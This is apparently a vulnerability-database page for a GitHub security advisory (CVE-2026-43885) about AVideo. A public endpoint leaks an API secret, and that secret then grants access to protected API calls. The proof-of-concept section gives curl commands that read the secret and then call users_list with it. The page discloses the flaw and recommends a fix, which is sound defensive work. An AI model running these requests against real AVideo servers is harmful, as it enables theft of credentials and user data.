GHSA-XR49-F4RH-QCJF
Vulnerability from github – Published: 2026-05-05 22:20 – Updated: 2026-05-13 14:28
VLAI
Summary
AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization
Details
Summary
An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints
(e.g. users_list) without logging in.
### Details
objects/plugins.json.php is public and still exposes plugin object_data containing APISecret.
That secret is accepted by plugin/API/get.json.php as authentication.
### PoC
1. Get plugin config (contains APISecret):
```bash
curl 'http:///objects/plugins.json.php'
<img width="879" height="94" alt="image" src="https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb" />
2. Copy APISecret from response, then call API directly:
```bash
curl --get 'http://<host>/plugin/API/get.json.php' \
--data-urlencode 'APIName=users_list' \
--data-urlencode 'APISecret=<APISecret>' \
--data-urlencode 'rowCount=3' \
--data-urlencode 'current=1'
### Impact Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.
### Recommended fix Requiring admin auth for full plugin inventory/config endpoint.
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-43885"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T22:20:42Z",
"nvd_published_at": "2026-05-11T22:22:13Z",
"severity": "HIGH"
},
"details": "### Summary\n An unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints\n (e.g. `users_list`) without logging in.\n\n ### Details\n `objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`.\n That secret is accepted by `plugin/API/get.json.php` as authentication.\n\n ### PoC\n 1. Get plugin config (contains `APISecret`):\n ```bash\n curl \u0027http://\u003chost\u003e/objects/plugins.json.php\u0027\n```\n\u003cimg width=\"879\" height=\"94\" alt=\"image\" src=\"https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb\" /\u003e\n\n 2. Copy APISecret from response, then call API directly:\n ```bash\n curl --get \u0027http://\u003chost\u003e/plugin/API/get.json.php\u0027 \\\n --data-urlencode \u0027APIName=users_list\u0027 \\\n --data-urlencode \u0027APISecret=\u003cAPISecret\u003e\u0027 \\\n --data-urlencode \u0027rowCount=3\u0027 \\\n --data-urlencode \u0027current=1\u0027\n```\n\u003cimg width=\"1719\" height=\"170\" alt=\"image\" src=\"https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79\" /\u003e\n\n\n ### Impact\n Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.\n\n ### Recommended fix\n Requiring admin auth for full plugin inventory/config endpoint.",
"id": "GHSA-xr49-f4rh-qcjf",
"modified": "2026-05-13T14:28:45Z",
"published": "2026-05-05T22:20:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xr49-f4rh-qcjf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43885"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…